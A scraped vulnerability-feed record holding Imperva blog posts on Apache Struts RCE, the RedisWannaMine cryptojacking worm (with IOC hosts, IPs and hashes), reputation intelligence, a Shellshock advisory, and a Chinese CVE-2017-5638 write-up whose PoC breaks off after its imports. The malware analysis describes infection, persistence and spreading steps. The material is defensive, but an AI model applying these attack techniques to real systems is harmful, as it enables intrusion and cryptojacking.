professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "modified": "2017-12-18T17:43:16", "published": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "bulletinFamily": "blog", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "modified": "2017-09-18T20:33:25", "published": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-08T20:51:51", "bulletinFamily": "blog", "description": "Recently cryptojacking attacks have been spreading like wildfire. At Imperva we have witnessed it firsthand and even concluded that these attacks [hold roughly 90% of all remote code execution attacks in web applications](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>).\n\nHaving said that, all of the attacks we have seen so far, were somewhat limited in their complexity and capability. The attacks contained malicious code that downloaded a cryptominer executable file and ran it with a basic evasion technique or none at all.\n\nThis week we saw a new generation of cryptojacking attacks aimed at _both_ database servers and application servers. We dubbed one of these attacks _RedisWannaMine._\n\n_RedisWannaMine_ is more complex in terms of evasion techniques and capabilities. It demonstrates a worm-like behavior combined with advanced exploits to increase the attackers\u2019 infection rate and fatten their wallets.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png>)\n\nIn a nutshell, **cryptojacking attackers have upped their game and they are getting crazier by the minute!**\n\n## Cryptojacking 2.0/ RedisWannaMine\n\nImperva deploys a network of sensors to gather security intelligence. These sensors are deployed in publicly accessible databases and web servers. This week we recorded an interesting remote code execution (RCE) attack through our web application sensors. When we record an RCE attack that tries to download an external resource, we try to probe the remote host to gain further security information. This was the case this week when our sensors recorded the following attack vector that tried to exploit [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>):\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png>)\n\nWhen we probed the remote server we found a list of suspicious files:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2.png>)\n\nThe list includes known malicious files, like _minerd, _but also some unknown suspicious files like _transfer.sh._\n\nWhen we submitted _transfer.sh_ hash to Virus Total, we found it is fairly new, the first submission in 2018-03-05 and detected only by 10 engines:\n\n\n\nThis shell script file is a downloader that is similar in some ways to older cryptojacking downloaders we know:\n\n * It downloads a crypto miner malware from an external location\n * It gains persistency in the machine through new entries in _crontab_\n * It gains remote access to the machine through a new ssh key entry in _/root/.ssh/authorized_keys _and new entries in the system\u2019s _iptables_\n\nHowever, this downloader is unlike any downloader we\u2019ve seen before. In the following sections, we will list the new capabilities it offers.\n\n## Self-sufficient\n\nThe script installs a lot of packages using Linux standard package managers like _apt _and _yum_. This is probably to make sure it is self-sufficient and does not need to depend on local libraries in the victim\u2019s machine. As a hint to things to follow we saw it installs packages like _git, python, redis-tools, wget, gcc_ and _make_.\n\n## [](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4.png>)\n\n## Github integration\n\nThe script downloads a publicly available tool, named _masscan_, from a Github repository, then compiles and installs it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5.png>)\n\nThe project page <https://github.com/robertdavidgraham/masscan> describes it as \u201cTCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.\u201d\n\nAlso, it offers simple usage examples:\n\n## [](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6.png>)\n\n## Redis scan and infection\n\nThe script then launches another process named \u201c_redisscan.sh_\u201d. The new process uses the _masscan_ tool mentioned above to discover and infect publicly available Redis servers. It does so by creating a large list of IPs, **internal** and **external** and scanning port 6379 which is the default listening port of Redis.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png>)\n\nIf one of the IPs in the list is publicly available, the script launches the \u201c_redisrun.sh_\u201d process to infect it with the same crypto miner malware (\u201c_transfer.sh_\u201d). The infection is done using _redis-cli_ command line tool, that the downloader previously installed, that runs the \u201c_runcmd_\u201d payload.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8.png>)\n\n\u201c_runcmd_\u201d is a 10-line Redis command script that creates new entries in the Redis server crontab directory and thus infects the server and gains persistency in case someone notices the malware and deletes it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9.png>)\n\nNotice that the attacker uses line feeds, \u201c_\\n_\u201d, at the beginning and at the end of each key value. If you run these commands in a Redis server, a file with the following content will be created:\n\n## [](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10.png>)\n\n## SMB scan and infection\n\nAfter the script completed the Redis scan, it launches another scan process named \u201c_ebscan.sh_\u201d. This time the new process uses the _masscan_ tool to discover and infect publicly available Windows servers with the vulnerable SMB version. It does so by creating a large list of IPs, **internal** and **external**, and scanning port 445 which is the default listening port of SMB.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png>)\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2.png>)\n\nIn case you\u2019ve been living under a rock, the SMB vulnerability this script is scanning for, was used by the NSA to create the infamous \u201c_Eternal Blue_\u201d exploit. This exploit was later on adapted to carry out \u201c_WannaCry_\u201d, one the biggest cyberattacks in the world.\n\nWhen the script finds a vulnerable server, it launches the \u201c_ebrun.sh_\u201d process to infect it.\n\n\u201c_ebrun.sh_\u201d runs a Python implementation of the aforementioned \u201c_Eternal Blue_\u201d exploit and drops the file \u201c_x64.bin\u201d _in the vulnerable machine.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12.png>)\n\nWe used the _strings_ command to print all the strings of printable characters in the file and found a code that creates a malicious VBScript file named \u201c_poc.vbs_\u201d and runs it.\n\n\u201c_poc.vbs_\u201d downloads an executable from an external location, saves it in the vulnerable server as \u201c_admissioninit.exe_\u201d and runs it. Needless to say, \u201c_admissioninit.exe\u201d _is a well-known crypto miner malware.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13.png>)\n\n## What should I do?\n\n * Protect your web applications and databases. The initial attack vector was introduced through a web application vulnerability. A properly patched application or an application protected by a WAF should be safe.\n * Make sure you don\u2019t expose your Redis servers to the world. This can be achieved with a simple firewall rule.\n * Make sure you don\u2019t run machines with the vulnerable SMB version in your organization. You can use [this](<http://omerez.com/eternalblues/>) awesome tool to do check it\n\n## IOC\n\n**Hosts:**\n\nhttp://ipfs.io/\n\nhttp://admission.fri3nds.in/\n\n**IPs:**\n\n147.135.130.181\n\n217.182.195.23\n\n**Files:**\n\n615f70c80567aab97827f1a0690987061e105f004fbc6ed8db8ebee0cca59113 transfer.sh\n\n260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79 clay\n\n2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2 minerd\n\neb010a63650f4aa58f58a66c3082bec115b2fec5635fa856838a43add059869d admission.exe\n\nf8428b0ceb5eaf1e496d79824a9c2b6c685fdeb2ddc36b036748ea71b15a5d79 xmr-32.exe\n\ne1c9ffc6677c7c2a6edec5d47bdff5e572d8fdf57675c41ff9e63a8c20bb18db xmr-64.exe\n\ncdadd649c42d28264277dd8edd5b6de23c8070fbf7b5a5ecdcbe03d99613efba ebrun.sh\n\nb2f5abb708c3481ad69aa459e3107c892bceafd26122129c84338cac92bf4797 ebscan.sh\n\n99a4ded26895422707f7c92eca9c9d64212cc033c50010fb027fe32ab55386d9 eternalblue_exploit7.py\n\n34022a65a3eb93b109ed4c6e1233c6404197818a70f51ab654e2c7e474ee2539 eternalblue_exploit8.py\n\n9040274f28d8dbe9e2372fec6482964fa2de8a790c818a3238d0af5fda6c3dbf order.py\n\nc7ed3da4e8d29474909bb0c57e788799fbd3ff96a00e2a0d8f752ed494b9773f rangeip.py\n\ne74e8b14e00de1cdf14d885e3b8a85d33e33e0b239e202243fc4edeeb84a1325 redisrun.sh\n\n794a891cae3374bf28c78eeb3ca39bd59f6ed927f28477561cc0fd11909f34fb redisscan.sh\n\n1bca0088f84d9642002e8d403efb77f75596a9d9c50f171e587a66cc804fa971 runcmd\n\ne3d2088d0cf68efe57babddd7a6973ca5187a127f5e8932436a781391de0320c x64.bin", "modified": "2018-03-08T18:45:38", "published": "2018-03-08T18:45:38", "id": "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "href": "https://www.imperva.com/blog/2018/03/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/", "type": "impervablog", "title": "RedisWannaMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-14T03:35:02", "bulletinFamily": "blog", "description": "[Reputation intelligence](<https://www.imperva.com/app-security/threat-intelligence-101/reputation-intelligence/>) is information about cyber entities known for specific activity, whether malicious or benign, which can be fed to and actioned on by a web application firewall (WAF). It provides an additional application security layer by effectively identifying and blocking threats from known malicious sources. Using reputation intelligence, large amounts of traffic can be classified as malicious or benign, reducing the workload of WAFs to inspect the actual content of that traffic. You can better understand where traffic originates, who is creating it and the potential risk.\n\nWith up to date information on all known cyber entities delivered to your [WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>), reputation intelligence can help block an attack or allow legitimate traffic, which in turn significantly reduces false positives.\n\nExamples of reputation intelligence entities include:\n\n * **Malicious IP Addresses:** Sources that have repeatedly attacked other websites\n * **Anonymous Proxies**: Proxy servers used by attackers to hide their true location\n * **TOR Networks**: Anonymous communication software used by hackers to disguise the source of an attack\n * **IP Geo-location**: Geographic location from which attacks are initiated\n * **Phishing URLs**: Fraudulent sites (URLs) that are used in phishing attacks\n * **Comment Spammers**: IP addresses of known active comment spammers\n * **Remote File Include (RFI):** URLs that were identified as locations from where malicious files are downloaded\n * **SQL Injection IPs:** IP addresses that were identified as serial SQL injection attackers\n * **Scanner IPs:** IP addresses that were identified as serial scanner attackers\n * **Spamdexing:** URLs used in comment spam attacks\n\n## Benefits of Reputation Intelligence\n\nPeople often ask us why they should add reputation intelligence to their WAF. One of our large global customers summed it up best, \u201cReputation intelligence is the low hanging fruit, we just block based on the feeds delivered to the WAF and see immediate value \u2013 I\u2019m blocking the bad guys without creating new security rules.\u201d This is the fundamental benefit delivered by reputation intelligence \u2013 automated blocking of threats based on specific entities, such as IPs or URLs.\n\nThere are additional benefits to adding reputation intelligence to your WAF such as gaining geo-location information to reduce false positives and establish and enforce business policies. For example, many enterprises have geo-location restrictions. Some media entertainment companies such as Netflix provide service to their customers in the US only and they could use a geo-location feature to enforce that policy.\n\nReputation intelligence is also used to minimize false positives generated by a WAF by providing white list resources:\n\n * CDN IP addresses\n * Legitimate search engines\n * Well-known \u201cgood\u201d (non-malicious) entities\n\nA WAF can use this intelligence to exclude certain entities from strict policies. For example, if you want to block scanning attempts based on the resource polling frequency from servers you can do it while allowing legitimate search engine indexing traffic to avoid false positives.\n\nReputation intelligence will enable a WAF to enforce other business-oriented policies. For example, some enterprises want to allow users browsing access to their website from certain countries that use anonymized proxies. On the other hand, attackers frequently use automated tools behind anonymized proxies to attack web applications. A WAF with reputation intelligence can set a granular policy to block automated tools that hide behind anonymous proxies and TOR networks while allowing legitimate human traffic.\n\nApart from delivering feeds on cyber entities, reputation intelligence is also used to mitigate zero-day attacks. After the latest Apache Struts remote code execution vulnerability was released ([CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)) Imperva used its reputation intelligence service to push the mitigation for it in a matter of hours to SecureSphere WAF customers providing them with zero-day protection.\n\n## Measuring the Quality of Reputation Intelligence\n\nVarious vendors offer reputation intelligence services, so how do you know which one is best? Great question, difficult answer. If there are a lot of false positives that\u2019s an obvious indicator that the reputation intelligence service feed is not high quality and you don\u2019t want to use it. But there are several parameters to consider. Here\u2019s what to look for:\n\n * **Size of feed** \u2013 The number of entries in the feed will vary by the content\u2014from a few hundred to a few thousand\u2014but they should represent the real-world landscape of good and bad cyber entities that extend beyond IP addresses to include phishing sites, TOR networks, and proxies. For example, you might expect a feed of dedicated phishing sites to contain a few dozen active sites, malicious SQL injection IPs to contain a few hundred, and IP comment spam as much as 50,000 IPs.\n * **False-positive and true-positive rates** \u2013 This reflects the accuracy of the feed. Lower false-positive rates and higher true-positives rates indicate better feed quality.\n * **Geographic diversity** \u2013 In cases where a company\u2019s business is open to the entire world, you will want reputation feeds that cover all parts of the world and aren't limited to a specific geo-location, such as US traffic only.\n * **Reputation intelligence updates** \u2013 Most malicious entities are constantly changing. IPs on the world wide web are dynamically allocated to users. For example, the majority of phishing sites remain active for [only four to eight hours](<https://www.darkreading.com/threat-intelligence/14-million-new-phishing-sites-launched-each-month/d/d-id/1329955>). Therefore, the frequency in which the feeds are updated is important.\n\nYou need to be sure that a vendor\u2019s coverage of the web is wide enough. Vendors that see many gigabits of traffic per day across different regions around the world will have more visibility to provide more accurate coverage. This will dramatically increase the size of the feed and the true positive rate, reduce the number of false positives and provide higher diversity of resources.\n\n## You Have Reputation Intelligence, Now What?\n\nOnce you have reputation intelligence delivered via automated feed to your WAF you can take the following actions:\n\n * **Block threats** \u2013 With high quality reputation intelligence feeds you will see a low-to-zero false-positive rate and can begin using WAF in blocking mode.\n * **Perform forensics** \u2013 Gather reputation based traffic in your estate and use it to correlate with other security devices for forensics and incident response.\n * **Build** **compound policies** \u2013 Use the reputation intelligence feeds to create more robust security policies. For example, IP comment spam resource feeds can be combined with the behavior characteristics of publishing a comment on a web site (such as POST HTTP method and a parameter with a URL).\n\nIn summary, reputation intelligence improves your application security posture, reduces false positives, increases accuracy and mitigates zero day threats.\n\nLearn more about Imperva [reputation intelligence services](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) or [request a demo](<https://www.imperva.com/Resources/RequestDemo?src=WWW:RequestDemo:US:product-banner:demopage>).", "modified": "2017-11-13T16:30:38", "published": "2017-11-13T16:30:38", "href": "https://www.imperva.com/blog/2017/11/how-reputation-intelligence-improves-application-security/", "id": "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "type": "impervablog", "title": "How Reputation Intelligence Improves Application Security", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "paloalto": [{"lastseen": "2019-05-29T23:19:21", "bulletinFamily": "software", "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "modified": "2014-09-25T00:00:00", "published": "2014-09-24T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-03-07T09:25:04", "bulletinFamily": "info", "description": "! [](/Article/UploadPic/2017-3/201737152244987. png? www. myhack58. com) \nFreeBuf last exposure of the Struts 2 vulnerability is already more than six months ago. This vulnerability is a RCE remote code execution vulnerability. Simple to say, based on Jakarta Multipart resolver for file upload, exploit the vulnerability for remote code execution. The vulnerability by the constant information Nike Zheng reported. \nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework. \nVulnerability number\nCVE-2017-5638 \nVulnerability description\nThe Struts use the Jakarta parsing file upload request packet properly, when the remote attacker would construct a malicious Content-Type that could lead to remote command execution. \nIn fact in default. properties file, struts. multipart. parser of values there are two options, namely jakarta and pell in the original actually there is a third option cos it. Wherein the jakarta parser is the Struts 2 framework of the standard components. By default, jakarta is enabled, so the vulnerability of the seriousness of the need to get to grips with it. \nThe scope of the impact\nThe Struts 2.3.5 \u2013 Struts 2.3.31 \nThe Struts 2.5 \u2013 Struts 2.5.10 \nSolution\nIf you are using based on the Jakarta file upload Multipart resolver, please upgrade to Apache Struts 2.3. 32 or 2. 5. 10. 1 version; or you can switch to a different implementation of file upload Multipart resolver. \nVulnerability PoC \n#! /usr/bin/env python \n# encoding:utf-8 \nimport urllib2 \nimport sys \nfrom poster. encode import multipart_encode \nfrom poster. streaminghttp import register_openers 